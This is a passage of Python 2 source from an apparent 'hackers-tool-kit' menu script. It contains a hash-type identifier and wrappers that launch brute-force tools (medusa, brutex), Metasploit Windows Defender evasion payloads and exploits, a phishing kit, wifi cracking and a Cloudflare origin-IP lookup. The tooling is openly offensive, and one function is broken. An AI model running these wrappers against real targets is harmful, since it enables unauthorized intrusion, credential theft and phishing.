hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) 